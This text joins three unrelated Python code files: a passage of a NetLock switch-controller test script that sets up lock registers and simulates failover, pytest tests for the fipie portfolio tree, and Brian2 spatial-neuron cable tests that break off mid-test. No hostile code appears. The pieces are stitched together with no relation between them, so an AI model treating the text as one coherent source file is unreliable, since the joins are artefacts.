match_spec_1_1) test.entry_set_tag_table.append(entry_hdl_0) test.entry_set_tag_table.append(entry_hdl_1) test.entry_set_tag_table.append(entry_hdl_2) test.entry_set_tag_table.append(entry_hdl_3) zero_v = netlock_shared_and_exclusive_count_register_value_t(0, 0) tot_lk = int(test_param_get('lk')) hmap = [0 for i in range(tot_lk + 1)] if (test_param_get('slot') != None): slot_num = int(test_param_get('slot')) else: slot_num = MAX_SLOTS_NUM hash_v = 0 task_id = test_param_get('task_id') if (test_param_get('bm') == 'x') and (task_id != 'e'): #### microbenchmark exclusive lock low contention tot_num_lks = tot_lk qs = slot_num / tot_lk slots_v = netlock_slots_two_sides_register_value_t(0, qs) for i in range(1, tot_lk + 1): slots_v_list.append(slots_v) test.client.register_write_left_bound_register(sess_hdl, dev_tgt, i, qs*(i-1) + 1) left_bound_list.append(qs*(i-1) + 1) test.client.register_write_right_bound_register(sess_hdl, dev_tgt, i, qs*i) test.client.register_write_head_register(sess_hdl, dev_tgt, i, qs*(i-1) + 1) test.client.register_write_tail_register(sess_hdl, dev_tgt, i, qs*(i-1) + 1) test.client.register_write_shared_and_exclusive_count_register(sess_hdl, dev_tgt, i, zero_v) test.client.register_write_queue_size_op_register(sess_hdl, dev_tgt, i, 0) test.client.register_write_slots_two_sides_register(sess_hdl, dev_tgt, i, slots_v) #### CHANGE according to memory management match_spec = netlock_check_lock_exist_table_match_spec_t(i) action_spec = netlock_check_lock_exist_action_action_spec_t(i) entry_hdl = test.client.check_lock_exist_table_table_add_with_check_lock_exist_action( sess_hdl, dev_tgt, match_spec, action_spec) test.entry_check_lock_exist_table.append(entry_hdl) elif (test_param_get('bm') == 's') and (task_id != 'e'): #### microbenchmark shared lock tot_num_lks = tot_lk qs = slot_num / tot_lk slots_v_qs = netlock_slots_two_sides_register_value_t(0, qs) for i in range(1, tot_lk + 1): slots_v_list.append(slots_v_qs) 
test.client.register_write_left_bound_register(sess_hdl, dev_tgt, i, qs*(i-1) + 1) left_bound_list.append(qs*(i-1) + 1) test.client.register_write_right_bound_register(sess_hdl, dev_tgt, i, qs*i) test.client.register_write_head_register(sess_hdl, dev_tgt, i, qs*(i-1) + 1) test.client.register_write_tail_register(sess_hdl, dev_tgt, i, qs*(i-1) + 1) test.client.register_write_shared_and_exclusive_count_register(sess_hdl, dev_tgt, i, zero_v) test.client.register_write_queue_size_op_register(sess_hdl, dev_tgt, i, 0) test.client.register_write_slots_two_sides_register(sess_hdl, dev_tgt, i, slots_v_qs) match_spec = netlock_check_lock_exist_table_match_spec_t(i) action_spec = netlock_check_lock_exist_action_action_spec_t(i) entry_hdl = test.client.check_lock_exist_table_table_add_with_check_lock_exist_action( sess_hdl, dev_tgt, match_spec, action_spec) test.entry_check_lock_exist_table.append(entry_hdl) elif ((test_param_get('bm') == 't') or (test_param_get('bm') == 'v')): #### TPCC benchmark if (test_param_get('slot') != None): slot_num = int(test_param_get('slot')) else: slot_num = MAX_SLOTS_NUM client_node_num = test_param_get('client_node_num') warehouse = test_param_get('warehouse') task_id = test_param_get('task_id') batch_size = test_param_get('batch_size') main_dir = test_param_get('main_dir') if (test_param_get('memn') == MEM_BIN_PACK): if (task_id == 'p') or (task_id == '2'): filename_suffix = "tpcc_notablelock_incast_"+client_node_num+"_w_"+warehouse + "_sl_" + str(slot_num) + "_nomap.in" elif (task_id == 'q') or (task_id == '3'): filename_suffix = "tpcc_notablelock_multiserver_"+client_node_num+"_w_"+warehouse + "_sl_" + str(slot_num) + "_nomap.in" elif (task_id == 'g'): filename_suffix = "tpcc_notablelock_incast_"+client_node_num+"_w_"+warehouse + "_sl_" + str(slot_num) + "_map_" + batch_size + ".in" elif (task_id == 'e'): filename_suffix = "empty.in" else: filename_suffix = "tpcc_notablelock_incast_"+client_node_num+"_w_"+warehouse + "_sl_" + str(slot_num) + 
"_nomap.in" else: filename_suffix = "tpcc_notablelock_incast_random_sn_" + str(slot_num) + ".in" # filename = "/home/zhuolong/exp/netlock-code/controller_init/tpcc/" + filename_suffix filename = main_dir + "/switch_code/netlock/controller_init/tpcc/" + filename_suffix print "Input filename:",filename if (filename != "null"): fin = open(filename) start_bound = 0 while True: line = fin.readline() if not line: break words = [x.strip() for x in line.split(',')] lk = int(words[0]) + 1 hash_v += 1 hmap[lk] = hash_v lk_num = int(words[1]) slots_v = netlock_slots_two_sides_register_value_t(0, lk_num) slots_v_list.append(slots_v) test.client.register_write_left_bound_register(sess_hdl, dev_tgt, hash_v, start_bound + 1) left_bound_list.append(start_bound + 1) test.client.register_write_right_bound_register(sess_hdl, dev_tgt, hash_v, start_bound + lk_num) test.client.register_write_head_register(sess_hdl, dev_tgt, hash_v, start_bound + 1) test.client.register_write_tail_register(sess_hdl, dev_tgt, hash_v, start_bound + 1) test.client.register_write_shared_and_exclusive_count_register(sess_hdl, dev_tgt, hash_v, zero_v) test.client.register_write_queue_size_op_register(sess_hdl, dev_tgt, hash_v, 0) test.client.register_write_slots_two_sides_register(sess_hdl, dev_tgt, hash_v, slots_v) match_spec = netlock_check_lock_exist_table_match_spec_t(lk) action_spec = netlock_check_lock_exist_action_action_spec_t(hash_v) entry_hdl = test.client.check_lock_exist_table_table_add_with_check_lock_exist_action( sess_hdl, dev_tgt, match_spec, action_spec) test.entry_check_lock_exist_table.append(entry_hdl) start_bound = start_bound + lk_num tot_num_lks = hash_v def clean_tables(test, sess_hdl, dev_id): if (test.entry_hdls_ipv4): print "Deleting %d entries" % len(test.entry_hdls_ipv4) for entry_hdl in test.entry_hdls_ipv4: status = test.client.ipv4_route_table_delete( sess_hdl, dev_id, entry_hdl) if (test.entry_hdls_ipv4_2): print "Deleting %d entries" % len(test.entry_hdls_ipv4_2) for 
entry_hdl in test.entry_hdls_ipv4_2: status = test.client.ipv4_route_2_table_delete( sess_hdl, dev_id, entry_hdl) if (test.entry_ethernet_set_mac): print "Deleting %d entries" % len(test.entry_ethernet_set_mac) for entry_hdl in test.entry_ethernet_set_mac: status = test.client.ethernet_set_mac_delete( sess_hdl, dev_id, entry_hdl) if (test.entry_acquire_lock_table): print "Deleting %d entries" % len(test.entry_acquire_lock_table) for entry_hdl in test.entry_acquire_lock_table: status = test.client.acquire_lock_table_table_delete( sess_hdl, dev_id, entry_hdl) if (test.entry_dec_empty_slots_table): print "Deleting %d entries" % len(test.entry_dec_empty_slots_table) for entry_hdl in test.entry_dec_empty_slots_table: status = test.client.dec_empty_slots_table_table_delete( sess_hdl, dev_id, entry_hdl) if (test.entry_fix_src_port_table): print "Deleting %d entries" % len(test.entry_fix_src_port_table) for entry_hdl in test.entry_fix_src_port_table: status = test.client.fix_src_port_table_table_delete( sess_hdl, dev_id, entry_hdl) if (test.entry_check_lock_exist_table): print "Deleting %d entries" % len(test.entry_check_lock_exist_table) for entry_hdl in test.entry_check_lock_exist_table: status = test.client.check_lock_exist_table_table_delete( sess_hdl, dev_id, entry_hdl) if (test.entry_set_tag_table): print "Deleting %d entries" % len(test.entry_set_tag_table) for entry_hdl in test.entry_set_tag_table: status = test.client.set_tag_table_table_delete( sess_hdl, dev_id, entry_hdl) if (test.entry_change_mode_table): print "Deleting %d entries" % len(test.entry_change_mode_table) for entry_hdl in test.entry_change_mode_table: status = test.client.change_mode_table_table_delete( sess_hdl, dev_id, entry_hdl) if (test.entry_forward_to_server_table): print "Deleting %d entries" % len(test.entry_forward_to_server_table) for entry_hdl in test.entry_forward_to_server_table: status = test.client.forward_to_server_table_table_delete( sess_hdl, dev_id, entry_hdl) if 
(test.entry_get_tenant_inf_table): print "Deleting %d entries" % len(test.entry_get_tenant_inf_table) for entry_hdl in test.entry_get_tenant_inf_table: status = test.client.get_tenant_inf_table_table_delete( sess_hdl, dev_id, entry_hdl) print "closing session" status = test.conn_mgr.client_cleanup(sess_hdl) def failure_sim(test, sess_hdl, dev_tgt): global tot_num_lks print "failover BEGIN." sys.stdout.flush() # set failure_status to failure (failure_status_register) test.client.register_write_failure_status_register(sess_hdl, dev_tgt, 0, 1) # set head,tail register zero_v = netlock_shared_and_exclusive_count_register_value_t(0, 0) read_flags = netlock_register_flags_t(read_hw_sync = True) for i in range(1, tot_num_lks + 1): k_left = left_bound_list[i - 1] test.client.register_write_head_register(sess_hdl, dev_tgt, i, k_left) test.client.register_write_tail_register(sess_hdl, dev_tgt, i, k_left) test.client.register_write_shared_and_exclusive_count_register(sess_hdl, dev_tgt, i, zero_v) test.client.register_write_slots_two_sides_register(sess_hdl, dev_tgt, i, slots_v_list[i-1]) # set failure_status to normal test.client.register_write_failure_status_register(sess_hdl, dev_tgt, 0, 0) return class AcquireLockTest(pd_base_tests.ThriftInterfaceDataPlane): def __init__(self): pd_base_tests.ThriftInterfaceDataPlane.__init__(self, ["netlock"]) scapy_netlock_bindings() def runTest(self): #self.pkt.init() #sess_pkt = self.pkt.client_init() print "========== acquire lock test ==========" sess_hdl = self.conn_mgr.client_init() self.sids = [] try: if (test_param_get('target') == 'hw'): addPorts(self) else: print "test_param_get(target):", test_param_get('target') sids = random.sample(xrange(BASE_SID_NORM, MAX_SID_NORM), len(swports)) for port,sid in zip(swports[0:len(swports)], sids[0:len(sids)]): ip_address = port_ip_dic[port] match_spec = netlock_i2e_mirror_table_match_spec_t(ip_address) action_spec = netlock_i2e_mirror_action_action_spec_t(sid) result = 
self.client.i2e_mirror_table_table_add_with_i2e_mirror_action(sess_hdl, dev_tgt, match_spec, action_spec) info = mirror_session(MirrorType_e.PD_MIRROR_TYPE_NORM, Direction_e.PD_DIR_INGRESS, sid, port, True) print "port:", port, "; sid:", sid sys.stdout.flush() self.mirror.mirror_session_create(sess_hdl, dev_tgt, info) self.sids.append(sid) self.conn_mgr.complete_operations(sess_hdl) for sid in self.sids: self.mirror.mirror_session_enable(sess_hdl, Direction_e.PD_DIR_INGRESS, dev_tgt, sid) self.conn_mgr.complete_operations(sess_hdl) read_flags = netlock_register_flags_t(read_hw_sync = True) init_tables(self, sess_hdl, dev_tgt) self.conn_mgr.complete_operations(sess_hdl) self.devport_mgr.devport_mgr_set_copy_to_cpu(dev_id, True, cpu_port) print "INIT Finished." sys.stdout.flush() wait_time = 0 while (True): if (test_param_get('task_id') == 'f'): if (wait_time == 122): failure_sim(self, sess_hdl, dev_tgt) print "failover FINISHED." sys.stdout.flush() if (wait_time <= 122): wait_time += 1 count_0 = netlock_tenant_acq_counter_register_value_t(0, 0) for i in range(13): self.client.register_write_tenant_acq_counter_register(sess_hdl, dev_tgt, i, count_0) time.sleep(1) self.conn_mgr.complete_operations(sess_hdl) finally: for sid in self.sids: self.mirror.mirror_session_disable(sess_hdl, Direction_e.PD_DIR_INGRESS, dev_tgt, sid) for sid in self.sids: self.mirror.mirror_session_delete(sess_hdl, dev_tgt, sid) clean_tables(self, sess_hdl, dev_id)
python
from fipie import NoCluster, EqualWeight
from fipie.data import load_example_data
from fipie.tree import Tree, create_tree


def test_create_tree():
    """create_tree with NoCluster builds one leaf per asset plus a root node."""
    price = load_example_data()
    # Weekly returns, forward-filling missing prices before differencing.
    ret = price.asfreq('w', method='pad').pct_change()
    tree = create_tree(ret, NoCluster())

    # One node per column (asset) plus the single root.
    assert len(tree.nodes) == ret.shape[1] + 1

    root = tree.nodes[0]
    node = tree.nodes[1]
    assert str(root) == 'Node(root)'
    assert str(node) == 'Node(SPY)'
    assert str(tree) == 'Tree'
    assert not root.is_leaf
    assert node.is_leaf
    # Root sits at level 0; with NoCluster every asset hangs directly off it.
    assert root.level == 0
    assert node.level == 1


def test_tree_show():
    """Tree.show() renders the tree without raising (smoke test only)."""
    price = load_example_data()
    ret = price.asfreq('w', method='pad').pct_change()
    tree = create_tree(ret, NoCluster())
    tree.show()


def test_init_weight():
    """init_weights() clears weights previously set via set_local_weights."""
    price = load_example_data()
    ret = price.asfreq('w', method='pad').pct_change()
    tree = create_tree(ret, NoCluster())

    tree.set_local_weights(EqualWeight())
    node = tree.nodes[1]
    assert node.is_weight_set()

    tree.init_weights()
    assert not node.is_weight_set()
python
from __future__ import absolute_import import os import itertools from numpy.testing import assert_equal import pytest from brian2 import * from brian2.devices.device import reinit_and_delete from brian2.tests.utils import assert_allclose @pytest.mark.codegen_independent def test_custom_events(): # Set (could be moved in a setup) EL = -65*mV gL = 0.0003*siemens/cm**2 ev = ''' Im = gL * (EL - v) : amp/meter**2 event_time1 : second ''' # Create a three compartments morphology morpho = Soma(diameter=10*um) morpho.dend1 = Cylinder(n=1, diameter=1*um, length=10*um ) morpho.dend2 = Cylinder(n=1, diameter=1*um, length=10*um ) G = SpatialNeuron(morphology=morpho, model=ev, events={'event1': 't>=i*ms and t<i*ms+dt'}) G.run_on_event('event1', 'event_time1 = 0.1*ms') run(0.2*ms) # Event has size three now because there are three compartments assert_allclose(G.event_time1[:], [0.1, 0, 0]*ms) @pytest.mark.codegen_independent def test_construction(): BrianLogger.suppress_name('resolution_conflict') morpho = Soma(diameter=30*um) morpho.L = Cylinder(length=10*um, diameter=1*um, n=10) morpho.LL = Cylinder(length=5*um, diameter=2*um, n=5) morpho.LR = Cylinder(length=5*um, diameter=2*um, n=10) morpho.right = Cylinder(length=3*um, diameter=1*um, n=7) morpho.right.nextone = Cylinder(length=2*um, diameter=1*um, n=3) gL=1e-4*siemens/cm**2 EL=-70*mV eqs=''' Im=gL*(EL-v) : amp/meter**2 I : meter (point current) ''' # Check units of currents with pytest.raises(DimensionMismatchError): SpatialNeuron(morphology=morpho, model=eqs) eqs=''' Im=gL*(EL-v) : amp/meter**2 ''' neuron = SpatialNeuron(morphology=morpho, model=eqs, Cm=1 * uF / cm ** 2, Ri=100 * ohm * cm) # Test initialization of values neuron.LL.v = EL assert_allclose(neuron.L.main.v, 0*mV) assert_allclose(neuron.LL.v, EL) neuron.LL[1*um:3*um].v = 0*mV assert_allclose(neuron.LL.v, Quantity([EL, 0*mV, 0*mV, EL, EL])) assert_allclose(neuron.Cm, 1 * uF / cm ** 2) # Test morphological variables assert_allclose(neuron.L.main.distance, 
morpho.L.distance) assert_allclose(neuron.L.main.area, morpho.L.area) assert_allclose(neuron.L.main.length, morpho.L.length) # Check basic consistency of the flattened representation assert all(neuron.diffusion_state_updater._ends[:].flat >= neuron.diffusion_state_updater._starts[:].flat) # Check that length and distances make sense assert_allclose(sum(morpho.L.length), 10*um) assert_allclose(morpho.L.distance, (0.5 + np.arange(10))*um) assert_allclose(sum(morpho.LL.length), 5*um) assert_allclose(morpho.LL.distance, (10 + .5 + np.arange(5))*um) assert_allclose(sum(morpho.LR.length), 5*um) assert_allclose(morpho.LR.distance, (10 + 0.25 + np.arange(10)*0.5)*um) assert_allclose(sum(morpho.right.length), 3*um) assert_allclose(morpho.right.distance, (0.5 + np.arange(7))*3./7.*um) assert_allclose(sum(morpho.right.nextone.length), 2*um) assert_allclose(morpho.right.nextone.distance, 3*um + (0.5 + np.arange(3))*2./3.*um) @pytest.mark.codegen_independent def test_construction_coordinates(): # Same as test_construction, but uses coordinates instead of lengths to # set up everything # Note that all coordinates here are relative to the origin of the # respective cylinder BrianLogger.suppress_name('resolution_conflict') morpho = Soma(diameter=30*um) morpho.L = Cylinder(x=[0, 10]*um, diameter=1*um, n=10) morpho.LL = Cylinder(y=[0, 5]*um, diameter=2*um, n=5) morpho.LR = Cylinder(z=[0, 5]*um, diameter=2*um, n=10) morpho.right = Cylinder(x=[0, sqrt(2)*1.5]*um, y=[0, sqrt(2)*1.5]*um, diameter=1*um, n=7) morpho.right.nextone = Cylinder(y=[0, sqrt(2)]*um, z=[0, sqrt(2)]*um, diameter=1*um, n=3) gL=1e-4*siemens/cm**2 EL=-70*mV eqs=''' Im=gL*(EL-v) : amp/meter**2 I : meter (point current) ''' # Check units of currents with pytest.raises(DimensionMismatchError): SpatialNeuron(morphology=morpho, model=eqs) eqs=''' Im=gL*(EL-v) : amp/meter**2 ''' neuron = SpatialNeuron(morphology=morpho, model=eqs, Cm=1 * uF / cm ** 2, Ri=100 * ohm * cm) # Test initialization of values neuron.LL.v = EL 
assert_allclose(neuron.L.main.v, 0*mV) assert_allclose(neuron.LL.v, EL) neuron.LL[1*um:3*um].v = 0*mV assert_allclose(neuron.LL.v, Quantity([EL, 0*mV, 0*mV, EL, EL])) assert_allclose(neuron.Cm, 1 * uF / cm ** 2) # Test morphological variables assert_allclose(neuron.L.main.x, morpho.L.x) assert_allclose(neuron.LL.main.x, morpho.LL.x) assert_allclose(neuron.right.main.x, morpho.right.x) assert_allclose(neuron.L.main.distance, morpho.L.distance) # assert_allclose(neuron.L.main.diameter, morpho.L.diameter) assert_allclose(neuron.L.main.area, morpho.L.area) assert_allclose(neuron.L.main.length, morpho.L.length) # Check basic consistency of the flattened representation assert all(neuron.diffusion_state_updater._ends[:].flat >= neuron.diffusion_state_updater._starts[:].flat) # Check that length and distances make sense assert_allclose(sum(morpho.L.length), 10*um) assert_allclose(morpho.L.distance, (0.5 + np.arange(10))*um) assert_allclose(sum(morpho.LL.length), 5*um) assert_allclose(morpho.LL.distance, (10 + .5 + np.arange(5))*um) assert_allclose(sum(morpho.LR.length), 5*um) assert_allclose(morpho.LR.distance, (10 + 0.25 + np.arange(10)*0.5)*um) assert_allclose(sum(morpho.right.length), 3*um) assert_allclose(morpho.right.distance, (0.5 + np.arange(7))*3./7.*um) assert_allclose(sum(morpho.right.nextone.length), 2*um) assert_allclose(morpho.right.nextone.distance, 3*um + (0.5 + np.arange(3))*2./3.*um) @pytest.mark.long def test_infinitecable(): ''' Test simulation of an infinite cable vs. 
theory for current pulse (Green function) ''' BrianLogger.suppress_name('resolution_conflict') defaultclock.dt = 0.001*ms # Morphology diameter = 1*um Cm = 1 * uF / cm ** 2 Ri = 100 * ohm * cm N = 500 morpho=Cylinder(diameter=diameter,length=3*mm,n=N) # Passive channels gL=1e-4*siemens/cm**2 eqs=''' Im=-gL*v : amp/meter**2 I : amp (point current) ''' neuron = SpatialNeuron(morphology=morpho, model=eqs, Cm=Cm, Ri=Ri) # Monitors mon=StateMonitor(neuron,'v',record=N/2-20) neuron.I[len(neuron)//2]=1*nA # injecting in the middle run(0.02*ms) neuron.I=0*amp run(3*ms) t = mon.t v = mon[N//2-20].v # Theory (incorrect near cable ends) x = 20*morpho.length[0] la = neuron.space_constant[0] taum = Cm/gL # membrane time constant theory = 1./(la*Cm*pi*diameter)*sqrt(taum/(4*pi*(t+defaultclock.dt)))*\ exp(-(t+defaultclock.dt)/taum-taum/(4*(t+defaultclock.dt))*(x/la)**2) theory = theory*1*nA*0.02*ms assert_allclose(v[t>0.5*ms],theory[t>0.5*ms], rtol=1e14, atol=1e10) # high error tolerance (not exact because not infinite cable) @pytest.mark.standalone_compatible def test_finitecable(): ''' Test simulation of short cylinder vs. theory for constant current. 
''' if prefs.core.default_float_dtype is np.float32: pytest.skip('Need double precision for this test') BrianLogger.suppress_name('resolution_conflict') defaultclock.dt = 0.01*ms # Morphology diameter = 1*um length = 300*um Cm = 1 * uF / cm ** 2 Ri = 150 * ohm * cm N = 200 morpho=Cylinder(diameter=diameter,length=length,n=N) # Passive channels gL=1e-4*siemens/cm**2 EL=-70*mV eqs=''' Im=gL*(EL-v) : amp/meter**2 I : amp (point current) ''' neuron = SpatialNeuron(morphology=morpho, model=eqs, Cm=Cm, Ri=Ri) neuron.v = EL neuron.I[0]=0.02*nA # injecting at the left end run(100*ms) # Theory x = neuron.distance v = neuron.v la = neuron.space_constant[0] ra = la*4*Ri/(pi*diameter**2) theory = EL+ra*neuron.I[0]*cosh((length-x)/la)/sinh(length/la) assert_allclose(v-EL, theory-EL, rtol=1e12, atol=1e8) @pytest.mark.standalone_compatible def test_rallpack1(): ''' Rallpack 1 ''' if prefs.core.default_float_dtype is np.float32: pytest.skip('Need double precision for this test') defaultclock.dt = 0.05*ms # Morphology diameter = 1*um length = 1*mm Cm = 1 * uF / cm ** 2 Ri = 100 * ohm * cm N = 1000 morpho = Cylinder(diameter=diameter, length=length, n=N) # Passive channels gL = 1./(40000*ohm*cm**2) EL = -65*mV eqs = ''' Im = gL*(EL - v) : amp/meter**2 I : amp (point current, constant) ''' neuron = SpatialNeuron(morphology=morpho, model=eqs, Cm=Cm, Ri=Ri) neuron.v = EL neuron.I[0] = 0.1*nA # injecting at the left end #Record at the two ends mon = StateMonitor(neuron, 'v', record=[0, 999], when='start', dt=0.05*ms) run(250*ms + defaultclock.dt) # Load the theoretical results basedir = os.path.join(os.path.abspath(os.path.dirname(__file__)), 'rallpack_data') data_0 = np.loadtxt(os.path.join(basedir, 'ref_cable.0')) data_x = np.loadtxt(os.path.join(basedir, 'ref_cable.x')) scale_0 = max(data_0[:, 1]*volt) - min(data_0[:, 1]*volt) scale_x = max(data_x[:, 1]*volt) - min(data_x[:, 1]*volt) squared_diff_0 = (data_0[:, 1] * volt - mon[0].v)**2 squared_diff_x = (data_x[:, 1] * volt - 
mon[999].v)**2 rel_RMS_0 = sqrt(mean(squared_diff_0))/scale_0 rel_RMS_x = sqrt(mean(squared_diff_x))/scale_x max_rel_0 = sqrt(max(squared_diff_0))/scale_0 max_rel_x = sqrt(max(squared_diff_x))/scale_x # sanity check: times are the same assert_allclose(mon.t/second, data_0[:, 0]) assert_allclose(mon.t/second, data_x[:, 0]) # RMS error should be < 0.1%, maximum error along the curve should be < 0.5% assert 100*rel_RMS_0 < 0.1 assert 100*rel_RMS_x < 0.1 assert 100*max_rel_0 < 0.5 assert 100*max_rel_x < 0.5 @pytest.mark.standalone_compatible def test_rallpack2(): ''' Rallpack 2 ''' if prefs.core.default_float_dtype is np.float32: pytest.skip('Need double precision for this test') defaultclock.dt = 0.1*ms # Morphology diameter = 32*um length = 16*um Cm = 1 * uF / cm ** 2 Ri = 100 * ohm * cm # Construct binary tree according to Rall's formula morpho = Cylinder(n=1, diameter=diameter, y=[0, float(length)]*meter) endpoints = {morpho} for depth in range(1, 10): diameter /= 2.**(1./3.) length /= 2.**(2./3.) 
new_endpoints = set() for endpoint in endpoints: new_L = Cylinder(n=1, diameter=diameter, length=length) new_R = Cylinder(n=1, diameter=diameter, length=length) new_endpoints.add(new_L) new_endpoints.add(new_R) endpoint.L = new_L endpoint.R = new_R endpoints = new_endpoints # Passive channels gL = 1./(40000*ohm*cm**2) EL = -65*mV eqs = ''' Im = gL*(EL - v) : amp/meter**2 I : amp (point current, constant) ''' neuron = SpatialNeuron(morphology=morpho, model=eqs, Cm=Cm, Ri=Ri, method='rk4') neuron.v = EL neuron.I[0] = 0.1*nA # injecting at the origin endpoint_indices = [endpoint.indices[0] for endpoint in endpoints] mon = StateMonitor(neuron, 'v', record=[0] + endpoint_indices, when='start', dt=0.1*ms) run(250*ms + defaultclock.dt) # Load the theoretical results basedir = os.path.join(os.path.abspath(os.path.dirname(__file__)), 'rallpack_data') # Only use very second time step, since we run with 0.1ms instead of 0.05ms data_0 = np.loadtxt(os.path.join(basedir, 'ref_branch.0'))[::2] data_x = np.loadtxt(os.path.join(basedir, 'ref_branch.x'))[::2] # sanity check: times are the same assert_allclose(mon.t/second, data_0[:, 0]) assert_allclose(mon.t/second, data_x[:, 0]) # Check that all endpoints are the same: for endpoint in endpoints: assert_allclose(mon[endpoint].v, mon[endpoint[0]].v) scale_0 = max(data_0[:, 1]*volt) - min(data_0[:, 1]*volt) scale_x = max(data_x[:, 1]*volt) - min(data_x[:, 1]*volt) squared_diff_0 = (data_0[:, 1] * volt - mon[0].v)**2 # One endpoint squared_diff_x = (data_x[:, 1] * volt - mon[endpoint_indices[0]].v)**2 rel_RMS_0 = sqrt(mean(squared_diff_0))/scale_0 rel_RMS_x = sqrt(mean(squared_diff_x))/scale_x max_rel_0 = sqrt(max(squared_diff_0))/scale_0 max_rel_x = sqrt(max(squared_diff_x))/scale_x # RMS error should be < 0.25%, maximum error along the curve should be < 0.5% assert 100*rel_RMS_0 < 0.25 assert 100*rel_RMS_x < 0.25 assert 100*max_rel_0 < 0.5 assert 100*max_rel_x < 0.5 @pytest.mark.standalone_compatible @pytest.mark.long def 
test_rallpack3(): ''' Rallpack 3 ''' if prefs.core.default_float_dtype is np.float32: pytest.skip('Need double precision for this test') defaultclock.dt = 1*usecond # Morphology diameter = 1*um length = 1*mm N = 1000 morpho = Cylinder(diameter=diameter, length=length, n=N) # Passive properties gl = 1./(40000*ohm*cm**2) El = -65*mV Cm = 1 * uF / cm ** 2 Ri = 100 * ohm * cm # Active properties ENa = 50*mV EK = -77*mV gNa = 120*msiemens/cm**2 gK = 36*msiemens/cm**2 eqs = ''' Im = gl * (El-v) + gNa * m**3 * h * (ENa-v) + gK * n**4 * (EK-v) : amp/meter**2 dm/dt = alpham * (1-m) - betam * m : 1 dn/dt = alphan * (1-n) - betan * n : 1 dh/dt = alphah * (1-h) - betah * h : 1 v_shifted = v - El : volt alpham = (0.1/mV) * (-v_shifted+25*mV) / (exp((-v_shifted+25*mV) / (10*mV)) - 1)/ms : Hz betam = 4 * exp(-v_shifted/(18*mV))/ms : Hz alphah = 0.07 * exp(-v_shifted/(20*mV))/ms : Hz betah = 1/(exp((-v_shifted+30*mV) / (10*mV)) + 1)/ms : Hz alphan = (0.01/mV) * (-v_shifted+10*mV) / (exp((-v_shifted+10*mV) / (10*mV)) - 1)/ms : Hz betan = 0.125*exp(-v_shifted/(80*mV))/ms : Hz I : amp (point current, constant) ''' axon = SpatialNeuron(morphology=morpho, model=eqs, Cm=Cm, Ri=Ri, method='exponential_euler') axon.v = El # Pre-calculated equilibrium values at v = El axon.m = 0.0529324852572 axon.n = 0.317676914061 axon.h = 0.596120753508 axon.I[0] = 0.1*nA # injecting at the left end #Record at the two ends mon = StateMonitor(axon, 'v', record=[0, 999], when='start', dt=0.05*ms) run(250*ms + defaultclock.dt) # Load the theoretical results basedir = os.path.join(os.path.abspath(os.path.dirname(__file__)), 'rallpack_data') data_0 = np.loadtxt(os.path.join(basedir, 'ref_axon.0.neuron')) data_x = np.loadtxt(os.path.join(basedir, 'ref_axon.x.neuron')) # sanity check: times are the same assert_allclose(mon.t/second, data_0[:, 0]) assert_allclose(mon.t/second, data_x[:, 0]) scale_0 = max(data_0[:, 1]*volt) - min(data_0[:, 1]*volt) scale_x = max(data_x[:, 1]*volt) - min(data_x[:, 1]*volt) 
squared_diff_0 = (data_0[:, 1] * volt - mon[0].v)**2 squared_diff_x = (data_x[:, 1] * volt - mon[999].v)**2 rel_RMS_0 = sqrt(mean(squared_diff_0))/scale_0 rel_RMS_x = sqrt(mean(squared_diff_x))/scale_x max_rel_0 = sqrt(max(squared_diff_0))/scale_0 max_rel_x = sqrt(max(squared_diff_x))/scale_x # RMS error should be < 0.1%, maximum error along the curve should be < 0.5% # Note that this is much stricter than the original Rallpack evaluation, but # with the 1us time step, the voltage traces are extremely similar assert 100*rel_RMS_0 < 0.1 assert 100*rel_RMS_x < 0.1 assert 100*max_rel_0 < 0.5 assert 100*max_rel_x < 0.5 @pytest.mark.standalone_compatible def test_rall(): ''' Test simulation of a cylinder plus two branches, with diameters according to Rall's formula ''' if prefs.core.default_float_dtype is np.float32: pytest.skip('Need double precision for this test') BrianLogger.suppress_name('resolution_conflict') defaultclock.dt = 0.01*ms # Passive channels gL=1e-4*siemens/cm**2 EL=-70*mV # Morphology diameter = 1*um length = 300*um Cm = 1 * uF / cm ** 2 Ri = 150 * ohm * cm N = 500 rm = 1/(gL * pi * diameter) # membrane resistance per unit length ra = (4 * Ri)/(pi * diameter**2) # axial resistance per unit length la = sqrt(rm/ra) # space length morpho=Cylinder(diameter=diameter,length=length,n=N) d1 = 0.5*um L1 = 200*um rm = 1/(gL * pi * d1) # membrane resistance per unit length ra = (4 * Ri)/(pi * d1**2) # axial resistance per unit length l1 = sqrt(rm/ra) # space length morpho.L=Cylinder(diameter=d1,length=L1,n=N) d2 = (diameter**1.5-d1**1.5)**(1./1.5) rm = 1/(gL * pi * d2) # membrane resistance per unit length ra = (4 * Ri)/(pi * d2**2) # axial resistance per unit length l2 = sqrt(rm/ra) # space length L2 = (L1/l1)*l2 morpho.R=Cylinder(diameter=d2,length=L2,n=N) eqs=''' Im=gL*(EL-v) : amp/meter**2 I : amp (point current) ''' neuron = SpatialNeuron(morphology=morpho, model=eqs, Cm=Cm, Ri=Ri) neuron.v = EL neuron.I[0]=0.02*nA # injecting at the left end run(100*ms) # 
Check space constant calculation assert_allclose(la, neuron.space_constant[0]) assert_allclose(l1, neuron.L.space_constant[0]) assert_allclose(l2, neuron.R.space_constant[0]) # Theory x = neuron.main.distance ra = la*4*Ri/(pi*diameter**2) l = length/la + L1/l1 theory = EL+ra*neuron.I[0]*cosh(l-x/la)/sinh(l) v = neuron.main.v assert_allclose(v-EL, theory-EL, rtol=1e12, atol=1e8) x = neuron.L.distance theory = EL+ra*neuron.I[0]*cosh(l-neuron.main.distance[-1]/la-(x-neuron.main.distance[-1])/l1)/sinh(l) v = neuron.L.v assert_allclose(v-EL, theory-EL, rtol=1e12, atol=1e8) x = neuron.R.distance theory = EL+ra*neuron.I[0]*cosh(l-neuron.main.distance[-1]/la-(x-neuron.main.distance[-1])/l2)/sinh(l) v = neuron.R.v assert_allclose(v-EL, theory-EL, rtol=1e12, atol=1e8) @pytest.mark.standalone_compatible def test_basic_diffusion(): # A very basic test that shows that propagation is working in a very basic # sense, testing all morphological classes defaultclock.dt = 0.01*ms EL = -70*mV gL = 1e-4*siemens/cm**2 target = -10*mV eqs = ''' Im = gL*(EL-v) + gClamp*(target-v): amp/meter**2 gClamp : siemens/meter**2 ''' morph = Soma(diameter=30*um) morph.axon = Cylinder(n=10, diameter=10*um, length=100*um) morph.dend = Section(n=10, diameter=[10, 9, 8, 7, 6, 5, 4, 3, 2, 1, 0.1]*um, length=np.ones(10)*10*um) neuron = SpatialNeuron(morph, eqs) neuron.v = EL neuron.axon.gClamp[0] = 100*siemens/cm**2 